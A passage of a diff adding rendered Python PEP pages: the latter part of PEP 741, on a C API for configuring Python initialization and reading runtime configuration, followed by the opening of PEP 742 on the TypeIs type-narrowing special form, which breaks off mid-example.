+

Get the runtime configuration

+

PEP 587 has no API to get the current runtime configuration, +only to configure the Python initialization.

+

For example, the global configuration variable +Py_UnbufferedStdioFlag was deprecated in Python 3.12 and using +PyConfig.buffered_stdio is recommended instead. It only works to +configure Python; there is no public API to get +PyConfig.buffered_stdio.

+

Users of the limited C API are asking for a public API to get the +current runtime configuration.

+

Cython needs to get the optimization_level configuration option: +issue.

+

When global configuration variables were deprecated in 2022, Marc-André +Lemburg requested +a C API to access these configuration variables at runtime (not only +during Python initialization).

+
+
+

Security fix

+

To fix CVE-2020-10735, +a denial of service when converting a very large string to an integer (in base +10), adding a new PyConfig member to stable +branches was discussed, which would have affected the ABI.

+

Gregory P. Smith proposed a different API using a text-based configuration +file to not be limited by PyConfig members: FR: Allow private +runtime config to enable extending without breaking the PyConfig ABI +(August 2022).

+

In the end, it was decided to not add a new PyConfig member to +stable branches, but only add a new PyConfig.int_max_str_digits +member to the development branch (which became Python 3.12). A dedicated +private global variable (unrelated to PyConfig) is used in stable +branches.

+
+
+

Redundancy between PyPreConfig and PyConfig

+

The Python preinitialization uses the PyPreConfig structure and the +Python initialization uses the PyConfig structure. Both structures +have four duplicated members: dev_mode, parse_argv, isolated +and use_environment.

+

The redundancy is caused by the fact that the two structures are +separated, whereas some PyConfig members are needed by the +preinitialization.

+
+
+

Embedding Python

+
+

Applications embedding Python

+

Examples:

+ +

On Linux, FreeBSD and macOS, applications are usually either statically +linked to a libpython, or dynamically load a libpython. The +libpython shared library is versioned, for example: +libpython3.12.so for Python 3.12 on Linux.

+

The vim project can target the stable ABI. Usually, the “system Python” +version is used. It’s not currently possible to select which Python +version to use. Users would like the ability to select a newer Python +on demand.

+

On Linux, another approach to deploy an application embedding Python, +such as GIMP, is to include Python in a Flatpak, AppImage or Snap +“container”. In this case, the application brings its own copy of Python +with the container.

+
+
+

Libraries embedding Python

+

Examples:

+ +
+
+

Utilities creating standalone applications

+ +

These utilities create standalone applications; they are not linked to +libpython.

+
+
+
+

Set the runtime configuration

+

Marc-André Lemburg requested +a C API to set the value of some configuration options at runtime:

+
    +
  • optimization_level
  • +
  • verbose
  • +
  • parser_debug
  • +
  • inspect
  • +
  • write_bytecode
  • +
+

Previously, it was possible to set directly global configuration +variables:

+
    +
  • Py_OptimizeFlag
  • +
  • Py_VerboseFlag
  • +
  • Py_DebugFlag
  • +
  • Py_InspectFlag
  • +
  • Py_DontWriteBytecodeFlag
  • +
+

But these configuration flags were deprecated in Python 3.12 and are +scheduled for removal in Python 3.14.

+
+
+
+

Specification

+

Add C API functions and a structure to configure the Python +initialization:

+
    +
  • Create config:
      +
    • PyInitConfig opaque structure.
    • +
    • PyInitConfig_Create().
    • +
    • PyInitConfig_Free(config).
    • +
    +
  • +
  • Get options:
      +
    • PyInitConfig_HasOption(config, name).
    • +
    • PyInitConfig_GetInt(config, name, &value).
    • +
    • PyInitConfig_GetStr(config, name, &value).
    • +
    • PyInitConfig_GetStrList(config, name, &length, &items).
    • +
    • PyInitConfig_FreeStrList().
    • +
    +
  • +
  • Set options:
      +
    • PyInitConfig_SetInt(config, name, value).
    • +
    • PyInitConfig_SetStr(config, name, value).
    • +
    • PyInitConfig_SetStrList(config, name, length, items).
    • +
    • PyInitConfig_AddModule(config, name, initfunc)
    • +
    +
  • +
  • Initialize:
      +
    • Py_InitializeFromInitConfig(config).
    • +
    +
  • +
  • Error handling:
      +
    • PyInitConfig_GetError(config, &err_msg).
    • +
    • PyInitConfig_GetExitcode(config, &exitcode).
    • +
    +
  • +
+

Add C API functions to get and set the current runtime configuration:

+
    +
  • PyConfig_Get(name).
  • +
  • PyConfig_GetInt(name, &value).
  • +
  • PyConfig_Set(name).
  • +
  • PyConfig_Names().
  • +
+

The C API uses null-terminated UTF-8 encoded strings to refer to a +configuration option name.

+

These C API functions are excluded from the limited C API.

+
+

PyInitConfig structure

+

The PyInitConfig structure is implemented by combining the three +structures of the PyConfig API and has an inittab member as +well:

+
    +
  • PyPreConfig preconfig
  • +
  • PyConfig config
  • +
  • PyStatus status
  • +
  • struct _inittab *inittab for PyInitConfig_AddModule()
  • +
+

The PyStatus status is no longer separate, but part of the unified +PyInitConfig structure, which makes the API easier to use.

+
+
+

Configuration Options

+

Configuration options are named after PyPreConfig and PyConfig +structure members. See the PyPreConfig documentation and +the PyConfig documentation.

+

Deprecating and removing configuration options is out of the scope of +this PEP and should be discussed on a case-by-case basis.

+
+

Public configuration options

+

The following options can be read by PyConfig_Get() and set by +PyConfig_Set().

Option | Type | Comment
argv | list[str] | API: sys.argv.
base_exec_prefix | str | API: sys.base_exec_prefix.
base_executable | str | API: sys._base_executable.
base_prefix | str | API: sys.base_prefix.
bytes_warning | int | API: sys.flags.bytes_warning.
exec_prefix | str | API: sys.exec_prefix.
executable | str | API: sys.executable.
inspect | bool | API: sys.flags.inspect (int).
int_max_str_digits | int | API: sys.flags.int_max_str_digits, sys.get_int_max_str_digits() and sys.set_int_max_str_digits().
interactive | bool | API: sys.flags.interactive.
module_search_paths | list[str] | API: sys.path.
optimization_level | int | API: sys.flags.optimize.
parser_debug | bool | API: sys.flags.debug (int).
platlibdir | str | API: sys.platlibdir.
prefix | str | API: sys.prefix.
pycache_prefix | str | API: sys.pycache_prefix.
quiet | bool | API: sys.flags.quiet (int).
stdlib_dir | str | API: sys._stdlib_dir.
use_environment | bool | API: sys.flags.ignore_environment (int).
verbose | int | API: sys.flags.verbose.
warnoptions | list[str] | API: sys.warnoptions.
write_bytecode | bool | API: sys.flags.dont_write_bytecode (int) and sys.dont_write_bytecode (bool).
xoptions | dict[str, str] | API: sys._xoptions.
+

Some option names are different than sys attributes, such as +optimization_level option and sys.flags.optimize attribute. +PyConfig_Set() sets the corresponding sys attribute.

+

The xoptions option is a list of strings in PyInitConfig where each +string has the format key (the value is implicitly True) or +key=value. In the current runtime configuration, it becomes a +dictionary (key: str → value: str | True).
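For illustration, a minimal sketch of setting xoptions during initialization, using the “Set” functions specified above (it assumes a PyInitConfig *config created as described in this PEP; the particular -X options shown are just examples):

// Each item is either "key" (implicitly True) or "key=value".
// At runtime, sys._xoptions would then contain
// {'dev': True, 'pycache_prefix': '/tmp/pyc'}.
char *xoptions[] = {"dev", "pycache_prefix=/tmp/pyc"};
if (PyInitConfig_SetStrList(config, "xoptions",
                            Py_ARRAY_LENGTH(xoptions), xoptions) < 0) {
    // error set in config: see PyInitConfig_GetError()
}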

+
+
+

Read-only configuration options

+

The following options can be read by PyConfig_Get(), but cannot be set by +PyConfig_Set().

Option | Type | Comment
allocator | int |
buffered_stdio | bool |
check_hash_pycs_mode | str |
code_debug_ranges | bool |
coerce_c_locale | bool |
coerce_c_locale_warn | bool |
configure_c_stdio | bool |
configure_locale | bool |
cpu_count | int | API: os.cpu_count() (int | None).
dev_mode | bool | API: sys.flags.dev_mode.
dump_refs | bool |
dump_refs_file | str |
faulthandler | bool | API: faulthandler.is_enabled().
filesystem_encoding | str | API: sys.getfilesystemencoding().
filesystem_errors | str | API: sys.getfilesystemencodeerrors().
hash_seed | int |
home | str |
import_time | bool |
install_signal_handlers | bool |
isolated | bool | API: sys.flags.isolated (int).
legacy_windows_fs_encoding | bool | Windows only.
legacy_windows_stdio | bool | Windows only.
malloc_stats | bool |
orig_argv | list[str] | API: sys.orig_argv.
parse_argv | bool |
pathconfig_warnings | bool |
perf_profiling | bool | API: sys.is_stack_trampoline_active().
program_name | str |
run_command | str |
run_filename | str |
run_module | str |
run_presite | str | Needs a debug build.
safe_path | bool |
show_ref_count | bool |
site_import | bool | API: sys.flags.no_site (int).
skip_source_first_line | bool |
stdio_encoding | str | API: sys.stdin.encoding, sys.stdout.encoding and sys.stderr.encoding.
stdio_errors | str | API: sys.stdin.errors, sys.stdout.errors and sys.stderr.errors.
tracemalloc | int | API: tracemalloc.is_tracing() (bool).
use_frozen_modules | bool |
use_hash_seed | bool |
user_site_directory | bool | API: sys.flags.no_user_site (int).
utf8_mode | bool |
warn_default_encoding | bool |
_pystats | bool | API: sys._stats_on(), sys._stats_off(). Needs a Py_STATS build.
+
+
+
+

Create Config

+
+
PyInitConfig structure:
Opaque structure to configure the Python preinitialization and the +Python initialization.
+
PyInitConfig* PyInitConfig_Create(void):
Create a new initialization configuration using default values +of the Isolated Configuration.

It must be freed with PyInitConfig_Free().

+

Return NULL on memory allocation failure.

+
+
void PyInitConfig_Free(PyInitConfig *config):
Free memory of an initialization configuration.
+
+
+
+

Get Options

+

The configuration option name parameter must be a non-NULL +null-terminated UTF-8 encoded string.

+
+
int PyInitConfig_HasOption(PyInitConfig *config, const char *name):
Test if the configuration has an option called name.

Return 1 if the option exists, or return 0 otherwise.

+
+
int PyInitConfig_GetInt(PyInitConfig *config, const char *name, int64_t *value):
Get an integer configuration option.
    +
  • Set *value, and return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+
+
int PyInitConfig_GetStr(PyInitConfig *config, const char *name, char **value):
Get a string configuration option as a null-terminated UTF-8 +encoded string.
    +
  • Set *value, and return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+

On success, the string must be released with free(value).

+
+
int PyInitConfig_GetStrList(PyInitConfig *config, const char *name, size_t *length, char ***items):
Get a string list configuration option as an array of +null-terminated UTF-8 encoded strings.
    +
  • Set *length and *items, and return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+

On success, the string list must be released with +PyInitConfig_FreeStrList(length, items).

+
+
void PyInitConfig_FreeStrList(size_t length, char **items):
Free memory of a string list created by +PyInitConfig_GetStrList().
+
+
+
+

Set Options

+

The configuration option name parameter must be a non-NULL +null-terminated UTF-8 encoded string.

+

Some configuration options have side effects on other options. This +logic is only implemented when Py_InitializeFromInitConfig() is +called, not by the “Set” functions below. For example, setting +dev_mode to 1 does not set faulthandler to 1.
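For example, a sketch (using the “Set” functions defined just below, and assuming a PyInitConfig *config) of setting a dependent option explicitly rather than relying on the side-effect logic:

// Setting "dev_mode" here does not update "faulthandler" in the config:
// that side effect is only applied later, inside
// Py_InitializeFromInitConfig(). Set "faulthandler" explicitly if the
// config is read back before initialization.
if (PyInitConfig_SetInt(config, "dev_mode", 1) < 0
    || PyInitConfig_SetInt(config, "faulthandler", 1) < 0)
{
    // error set in config: see PyInitConfig_GetError()
}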

+
+
int PyInitConfig_SetInt(PyInitConfig *config, const char *name, int64_t value):
Set an integer configuration option.
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+
+
int PyInitConfig_SetStr(PyInitConfig *config, const char *name, const char *value):
Set a string configuration option from a null-terminated UTF-8 +encoded string. The string is copied.
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+
+
int PyInitConfig_SetStrList(PyInitConfig *config, const char *name, size_t length, char * const *items):
Set a string list configuration option from an array of +null-terminated UTF-8 encoded strings. The string list is copied.
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+
+
int PyInitConfig_AddModule(PyInitConfig *config, const char *name, PyObject* (*initfunc)(void)):
Add a built-in extension module to the table of built-in modules.

The new module can be imported by the name name, and uses the +function initfunc as the initialization function called on the +first attempted import.

+
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+

If Python is initialized multiple times, +PyInitConfig_AddModule() must be called at each Python +initialization.

+

Similar to the PyImport_AppendInittab() function.
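For illustration, a minimal sketch of registering a built-in module; the module name myextension and the helper functions are hypothetical:

static struct PyModuleDef myextension_def = {
    PyModuleDef_HEAD_INIT,
    .m_name = "myextension",
    .m_size = 0,
};

static PyObject *
myextension_initfunc(void)
{
    return PyModule_Create(&myextension_def);
}

// Must be called before Py_InitializeFromInitConfig(), and again before
// each initialization if Python is initialized multiple times.
static int
add_myextension(PyInitConfig *config)
{
    return PyInitConfig_AddModule(config, "myextension",
                                  myextension_initfunc);
}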

+
+
+
+
+

Initialize Python

+
+
int Py_InitializeFromInitConfig(PyInitConfig *config):
Initialize Python from the initialization configuration.
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
  • Set an exit code in config and return -1 if Python wants to +exit.
  • +
+

See PyInitConfig_GetExitcode() for the exitcode case.

+
+
+
+
+

Error Handling

+
+
int PyInitConfig_GetError(PyInitConfig* config, const char **err_msg):
Get the config error message.
    +
  • Set *err_msg and return 1 if an error is set.
  • +
  • Set *err_msg to NULL and return 0 otherwise.
  • +
+

An error message is a UTF-8 encoded string.

+

If config has an exit code, format the exit code as an error +message.

+

The error message remains valid until another PyInitConfig +function is called with config. The caller doesn’t have to free the +error message.

+
+
int PyInitConfig_GetExitcode(PyInitConfig* config, int *exitcode):
Get the config exit code.
    +
  • Set *exitcode and return 1 if Python wants to exit.
  • +
  • Return 0 if config has no exit code set.
  • +
+

Only the Py_InitializeFromInitConfig() function can set an exit +code if the parse_argv option is non-zero.

+

An exit code can be set when parsing the command line failed (exit +code 2) or when a command line option asks to display the command +line help (exit code 0).
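Combining the two functions above, a sketch of handling a Py_InitializeFromInitConfig() failure that distinguishes “Python wants to exit” from a real error:

if (Py_InitializeFromInitConfig(config) < 0) {
    int exitcode;
    if (PyInitConfig_GetExitcode(config, &exitcode)) {
        // Python wants to exit: for example, "-h" was parsed from the
        // command line, or parsing the command line failed.
        PyInitConfig_Free(config);
        exit(exitcode);
    }

    // Otherwise, a genuine initialization error occurred.
    const char *err_msg;
    (void)PyInitConfig_GetError(config, &err_msg);
    fprintf(stderr, "PYTHON INIT ERROR: %s\n", err_msg);
    PyInitConfig_Free(config);
    return -1;
}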

+
+
+
+
+

Get and Set the Runtime Configuration

+

The configuration option name parameter must be a non-NULL +null-terminated UTF-8 encoded string.

+
+
PyObject* PyConfig_Get(const char *name):
Get the current runtime value of a configuration option as a Python +object.
    +
  • Return a new reference on success.
  • +
  • Set an exception and return NULL on error.
  • +
+

The object type depends on the option: see Configuration Options +tables.

+

Other options are read from the internal PyPreConfig and PyConfig structures.

+

The caller must hold the GIL. The function cannot be called before +Python initialization nor after Python finalization.

+
+
int PyConfig_GetInt(const char *name, int *value):
Similar to PyConfig_Get(), but get the value as an integer.
    +
  • Set *value and return 0 on success.
  • +
  • Set an exception and return -1 on error.
  • +
+
+
PyObject* PyConfig_Names(void):
Get all configuration option names as a frozenset.

Set an exception and return NULL on error.

+

The caller must hold the GIL.

+
+
PyObject* PyConfig_Set(const char *name, PyObject *value):
Set the current runtime value of a configuration option.
    +
  • Raise a ValueError if there is no option called name.
  • +
  • Raise a ValueError if value is an invalid value.
  • +
  • Raise a ValueError if the option is read-only: cannot be set.
  • +
  • Raise a TypeError if value does not have the proper type.
  • +
+

Read-only configuration options cannot be set.

+

The caller must hold the GIL. The function cannot be called before +Python initialization nor after Python finalization.
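For illustration, a sketch (the dump_runtime_config name is hypothetical) that combines PyConfig_Names() and PyConfig_Get() to print the whole runtime configuration; per the rules above, it must run with the GIL held, between Python initialization and finalization:

static int
dump_runtime_config(void)
{
    PyObject *names = PyConfig_Names();  // frozenset of option names
    if (names == NULL) {
        return -1;
    }
    PyObject *iter = PyObject_GetIter(names);
    Py_DECREF(names);
    if (iter == NULL) {
        return -1;
    }
    PyObject *name;
    while ((name = PyIter_Next(iter)) != NULL) {
        const char *utf8 = PyUnicode_AsUTF8(name);
        if (utf8 == NULL) {
            goto error;
        }
        PyObject *value = PyConfig_Get(utf8);  // new strong reference
        if (value == NULL) {
            goto error;
        }
        printf("%s = ", utf8);
        if (PyObject_Print(value, stdout, 0) < 0) {
            Py_DECREF(value);
            goto error;
        }
        printf("\n");
        Py_DECREF(value);
        Py_DECREF(name);
    }
    Py_DECREF(iter);
    return PyErr_Occurred() ? -1 : 0;

error:
    Py_DECREF(name);
    Py_DECREF(iter);
    return -1;
}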

+
+
+
+
+

Stability

+

The behavior of options, the default option values, and the Python +behavior can change at each Python version: they are not “stable”.

+

Moreover, configuration options can be added, deprecated and removed +following the usual PEP 387 deprecation process.

+
+
+

Interaction with the PyPreConfig and PyConfig APIs

+

The lower level PEP 587 PyPreConfig and PyConfig APIs remain +available and fully supported. As noted in the Abstract, they remain the +preferred approach for embedding use cases that are aiming to closely +emulate the behaviour of the full CPython CLI, rather than just making a +Python runtime available as part of a larger application.

+

The PyPreConfig APIs may be used in combination with the +initialization API in this PEP. In such cases, the read-only vs +read/write restrictions for preconfiguration settings apply to +PyInitConfig_SetInt in addition to PyConfig_Set once the +interpreter has been preconfigured (specifically, only +use_environment may be updated; attempting to update any of the +other preconfiguration variables will report an error).

+
+
+
+

Examples

+
+

Initialize Python

+

Example initializing Python, setting configuration options of various +types, and returning -1 on error:

+
int init_python(void)
+{
+    PyInitConfig *config = PyInitConfig_Create();
+    if (config == NULL) {
+        printf("PYTHON INIT ERROR: memory allocation failed\n");
+        return -1;
+    }
+
+    // Set an integer (dev mode)
+    if (PyInitConfig_SetInt(config, "dev_mode", 1) < 0) {
+        goto error;
+    }
+
+    // Set a list of UTF-8 strings (argv)
+    char *argv[] = {"my_program", "-c", "pass"};
+    if (PyInitConfig_SetStrList(config, "argv",
+                                 Py_ARRAY_LENGTH(argv), argv) < 0) {
+        goto error;
+    }
+
+    // Set a UTF-8 string (program name)
+    if (PyInitConfig_SetStr(config, "program_name", "my_program") < 0) {
+        goto error;
+    }
+
+    // Initialize Python with the configuration
+    if (Py_InitializeFromInitConfig(config) < 0) {
+        goto error;
+    }
+    PyInitConfig_Free(config);
+    return 0;
+
+error:
+    // Display the error message
+    const char *err_msg;
+    (void)PyInitConfig_GetError(config, &err_msg);
+    printf("PYTHON INIT ERROR: %s\n", err_msg);
+    PyInitConfig_Free(config);
+
+    return -1;
+}
+
+
+
+
+

Increase initialization bytes_warning option

+

Example increasing the bytes_warning option of an initialization +configuration:

+
int config_bytes_warning(PyInitConfig *config)
+{
+    int64_t bytes_warning;
+    if (PyInitConfig_GetInt(config, "bytes_warning", &bytes_warning) < 0) {
+        return -1;
+    }
+    bytes_warning += 1;
+    if (PyInitConfig_SetInt(config, "bytes_warning", bytes_warning) < 0) {
+        return -1;
+    }
+    return 0;
+}
+
+
+
+
+

Get the runtime verbose option

+

Example getting the current runtime value of the configuration option +verbose:

+
int get_verbose(void)
+{
+    int verbose;
+    if (PyConfig_GetInt("verbose", &verbose) < 0) {
+        // Silently ignore the error
+        PyErr_Clear();
+        return -1;
+    }
+    return verbose;
+}
+
+
+

On error, the function silently ignores the error and returns -1. In +practice, getting the verbose option cannot fail, unless a future +Python version removes the option.

+
+
+
+

Implementation

+ +
+
+

Backwards Compatibility

+

Changes are fully backward compatible. Only new APIs are added.

+

Existing APIs, such as the PyConfig C API (PEP 587), are left +unchanged.

+
+
+

Rejected Ideas

+
+

Configuration as text

+

It was proposed to provide the configuration as text to make the API +compatible with the stable ABI and to allow custom options.

+

Example:

+
# integer
+bytes_warning = 2
+
+# string
+filesystem_encoding = "utf8"   # comment
+
+# list of strings
+argv = ['python', '-c', 'code']
+
+
+

The API would take the configuration as a string, not as a file. Example +with a hypothetical PyInit_SetConfig() function:

+
void stable_abi_init_demo(int set_path)
+{
+    PyInit_SetConfig(
+        "isolated = 1\n"
+        "argv = ['python', '-c', 'code']\n"
+        "filesystem_encoding = 'utf-8'\n"
+    );
+    if (set_path) {
+        PyInit_SetConfig("pythonpath = '/my/path'");
+    }
+}
+
+
+

The example ignores error handling to make it easier to read.

+

The problem is that generating such configuration text requires adding +quotes to strings and escaping quotes within strings. Formatting an array +of strings becomes non-trivial.

+

Providing an API to format a string or an array of strings is not really +worth it, when Python can directly provide an API to set a +configuration option where the value is passed directly as a string or +an array of strings. This also avoids giving special meaning to some +characters, such as newline characters, which would otherwise have to be +escaped.

+
+
+

Refer to an option with an integer

+

Using strings to refer to a configuration option requires comparing +strings, which can be slower than comparing integers.

+

Use integers, similar to type “slots” such as Py_tp_doc, to refer to +a configuration option. The const char *name parameter is replaced +with int option.

+

Accepting custom options is more likely to cause conflicts when using +integers, since it’s harder to maintain “namespaces” (ranges) for +integer options. Using strings, a simple prefix with a colon separator +can be used.

+

Integers also require maintaining a list of integer constants, which +makes the C API and the Python API larger.

+

Python 3.13 only has around 62 configuration options, and so performance +is not really a blocking issue. If better performance is needed later, a +hash table can be used to get an option by its name.

+

If getting a configuration option is used in hot code, the value can be +read once and cached. By the way, most configuration options cannot be +changed at runtime.

+
+
+

Multi-phase initialization (similar to PEP 432)

+

Eric Snow expressed concerns +that this proposal might reinforce with embedders the idea that +initialization is a single monolithic step. He argued that initialization +involves 5 distinct phases and even suggested that the API should +reflect this explicitly. Eric proposed that, at the very least, the +implementation of initialization should reflect the phases, in part +for improved code health. Overall, his explanation has some +similarities with PEP 432 and PEP 587.

+

Another of Eric’s key points relevant to this PEP was that, ideally, +the config passed to Py_InitializeFromConfig() should be complete +before that function is called, whereas currently initialization +actually modifies the config.

+

While Eric wasn’t necessarily suggesting an alternative to PEP 741, +any proposal to add a granular initialization API around phases is +effectively the opposite of what this PEP is trying to accomplish. +Such an API is more complicated: it requires adding new public structures +and new public functions, and it makes the Python initialization more +complicated, whereas this PEP tries to unify existing APIs and make +them simpler. Having multiple structures for a similar +purpose can lead to duplicate members, a similar issue to the duplicated +members of the existing PyPreConfig and PyConfig structures.

+
+
+

Locale encoding and wide strings

+

Accepting strings encoded to the locale encoding and accepting wide +strings (wchar_t*) in the PyInitConfig API was deferred to keep +the PyInitConfig API simple and avoid the complexity of the Python +preinitialization. These features are also mostly needed when emulating +the full CPython CLI behaviour, and hence better served by the lower +level PEP 587 API.

+
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0741.rst

+

Last modified: 2024-09-03 13:37:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0742/index.html b/pep-0742/index.html new file mode 100644 index 00000000000..f85f83beb2c --- /dev/null +++ b/pep-0742/index.html @@ -0,0 +1,635 @@ + + + + + + + + PEP 742 – Narrowing types with TypeIs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 742 – Narrowing types with TypeIs

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
07-Feb-2024
+
Python-Version:
+
3.13
+
Post-History:
+
11-Feb-2024
+
Replaces:
+
724
+
Resolution:
+
03-Apr-2024
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see TypeIs and +typing.TypeIs for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP proposes a new special form, TypeIs, to allow annotating functions that can be used +to narrow the type of a value, similar to the builtin isinstance(). Unlike the existing +typing.TypeGuard special form, TypeIs can narrow the type in both the if +and else branches of a conditional.

+
+
+

Motivation

+

Typed Python code often requires users to narrow the type of a variable based on a conditional. +For example, if a function accepts a union of two types, it may use an isinstance() check +to discriminate between the two types. Type checkers commonly support type narrowing based on various +builtin functions and operations, but occasionally, it is useful to use a user-defined function to +perform type narrowing.

+

To support such use cases, PEP 647 introduced the typing.TypeGuard special form, which +allows users to define type guards:

+
from typing import assert_type, TypeGuard
+
+def is_str(x: object) -> TypeGuard[str]:
+    return isinstance(x, str)
+
+def f(x: object) -> None:
+    if is_str(x):
+        assert_type(x, str)
+    else:
+        assert_type(x, object)
+
+
+

Unfortunately, the behavior of typing.TypeGuard has some limitations that make it +less useful for many common use cases, as explained also in the “Motivation” section of PEP 724. +In particular:

+
    +
  • Type checkers must use exactly the TypeGuard return type as the narrowed type if the +type guard returns True. They cannot use pre-existing knowledge about the type of the +variable.
  • +
  • In the case where the type guard returns False, the type checker cannot apply any +additional narrowing.
  • +
+

The standard library function inspect.isawaitable() may serve as an example. It +returns whether the argument is an awaitable object, and +typeshed +currently annotates it as:

+
def isawaitable(object: object) -> TypeGuard[Awaitable[Any]]: ...
+
+
+

A user reported an issue to mypy about +the behavior of this function. They observed the following behavior:

+
import inspect
+from collections.abc import Awaitable
+from typing import reveal_type
+
+async def f(t: Awaitable[int] | int) -> None:
+    if inspect.isawaitable(t):
+        reveal_type(t)  # Awaitable[Any]
+    else:
+        reveal_type(t)  # Awaitable[int] | int
+
+
+

This behavior is consistent with PEP 647, but it did not match the user’s expectations. +Instead, they would expect the type of t to be narrowed to Awaitable[int] in the if +branch, and to int in the else branch. This PEP proposes a new construct that does +exactly that.

+

Other examples of issues that arose out of the current behavior of TypeGuard include:

+ +
+
+

Rationale

+

The problems with the current behavior of typing.TypeGuard compel us to improve +the type system to allow a different type narrowing behavior. PEP 724 proposed to change +the behavior of the existing typing.TypeGuard construct, but we believe +that the backwards compatibility implications of that change are too severe. Instead, we propose +adding a new special form with the desired semantics.

+

We acknowledge that this leads to an unfortunate situation where there are two constructs with +a similar purpose and similar semantics. We believe that users are more likely to want the behavior +of TypeIs, the new form proposed in this PEP, and therefore we recommend that documentation +emphasize TypeIs over TypeGuard as a more commonly applicable tool. However, the semantics of +TypeGuard are occasionally useful, and we do not propose to deprecate or remove it. In the long +run, most users should use TypeIs, and TypeGuard should be reserved for rare cases +where its behavior is specifically desired.

+
+
+

Specification

+

A new special form, TypeIs, is added to the typing +module. Its usage, behavior, and runtime implementation are similar to +those of typing.TypeGuard.

+

It accepts a single +argument and can be used as the return type of a function. A function annotated as returning a +TypeIs is called a type narrowing function. Type narrowing functions must return bool +values, and the type checker should verify that all return paths return +bool.

+

Type narrowing functions must accept at least one positional argument. The type +narrowing behavior is applied to the first positional argument passed to +the function. The function may accept additional arguments, but they are +not affected by type narrowing. If a type narrowing function is implemented as +an instance method or class method, the first positional argument maps +to the second parameter (after self or cls).

+
+

Type narrowing behavior

+

To specify the behavior of TypeIs, we use the following terminology:

+
    +
  • I = TypeIs input type
  • +
  • R = TypeIs return type
  • +
  • A = Type of argument passed to type narrowing function (pre-narrowed)
  • +
  • NP = Narrowed type (positive; used when TypeIs returned True)
  • +
  • NN = Narrowed type (negative; used when TypeIs returned False)
  • +
+
def narrower(x: I) -> TypeIs[R]: ...
+
+def func1(val: A):
+    if narrower(val):
+        assert_type(val, NP)
+    else:
+        assert_type(val, NN)
+
+
+

The return type R must be consistent with I. The type checker should +emit an error if this condition is not met.

+

Formally, type NP should be narrowed to A∧R, +the intersection of A and R, and type NN should be narrowed to +A∧¬R, the intersection of A and the complement of R. +In practice, the theoretic types for strict type guards cannot be expressed +precisely in the Python type system. Type checkers should fall back on +practical approximations of these types. As a rule of thumb, a type checker +should use the same type narrowing logic – and get results that are consistent +with – its handling of isinstance(). This guidance allows for changes and +improvements if the type system is extended in the future.

+
+
+

Examples

+

Type narrowing is applied in both the positive and negative case:

+
from typing import TypeIs, assert_type
+
+def is_str(x: object) -> TypeIs[str]:
+    return isinstance(x, str)
+
+def f(x: str | int) -> None:
+    if is_str(x):
+        assert_type(x, str)
+    else:
+        assert_type(x, int)
+
+
+

The final narrowed type may be narrower than R, due to the constraints of the +argument’s previously-known type:

+
from collections.abc import Awaitable
+from typing import Any, TypeIs, assert_type
+import inspect
+
+def isawaitable(x: object) -> TypeIs[Awaitable[Any]]:
+    return inspect.isawaitable(x)
+
+def f(x: Awaitable[int] | int) -> None:
+    if isawaitable(x):
+        # Type checkers may also infer the more precise type
+        # "Awaitable[int] | (int & Awaitable[Any])"
+        assert_type(x, Awaitable[int])
+    else:
+        assert_type(x, int)
+
+
+

It is an error to narrow to a type that is not consistent with the input type:

+
from typing import TypeIs
+
+def is_str(x: int) -> TypeIs[str]:  # Type checker error
+    ...
+
+
+
+
+

Subtyping

+

TypeIs is also valid as the return type of a callable, for example +in callback protocols and in the Callable special form. In these +contexts, it is treated as a subtype of bool. For example, Callable[..., TypeIs[int]] +is assignable to Callable[..., bool].

+

Unlike TypeGuard, TypeIs is invariant in its argument type: +TypeIs[B] is not a subtype of TypeIs[A], +even if B is a subtype of A. +To see why, consider the following example:

+
def takes_narrower(x: int | str, narrower: Callable[[object], TypeIs[int]]):
+    if narrower(x):
+        print(x + 1)  # x is an int
+    else:
+        print("Hello " + x)  # x is a str
+
+def is_bool(x: object) -> TypeIs[bool]:
+    return isinstance(x, bool)
+
+takes_narrower(1, is_bool)  # Error: is_bool is not a TypeIs[int]
+
+
+

(Note that bool is a subtype of int.) +This code fails at runtime, because the narrower returns False (1 is not a bool) +and the else branch is taken in takes_narrower(). +If the call takes_narrower(1, is_bool) was allowed, type checkers would fail to +detect this error.

+
+
+
+

Backwards Compatibility

+

As this PEP only proposes a new special form, there are no implications on +backwards compatibility.

+
+
+

Security Implications

+

None known.

+
+
+

How to Teach This

+

Introductions to typing should cover TypeIs when discussing how to narrow types, +along with discussion of other narrowing constructs such as isinstance(). The +documentation should emphasize TypeIs over typing.TypeGuard; while the +latter is not being deprecated and its behavior is occasionally useful, we expect that the +behavior of TypeIs is usually more intuitive, and most users should reach for +TypeIs first. The rest of this section contains some example content that could +be used in introductory user-facing documentation.

+
+

When to use TypeIs

+

Python code often uses functions like isinstance() to distinguish between +different possible types of a value. Type checkers understand isinstance() +and various other checks and use them to narrow the type of a variable. However, +sometimes you want to reuse a more complicated check in multiple places, or +you use a check that the type checker doesn’t understand. In these cases, you +can define a TypeIs function to perform the check and allow type checkers +to use it to narrow the type of a variable.

+

A TypeIs function takes a single argument and is annotated as returning +TypeIs[T], where T is the type that you want to narrow to. The function +must return True if the argument is of type T, and False otherwise. +The function can then be used in if checks, just like you would use isinstance(). +For example:

+
from typing import TypeIs, Literal
+
+type Direction = Literal["N", "E", "S", "W"]
+
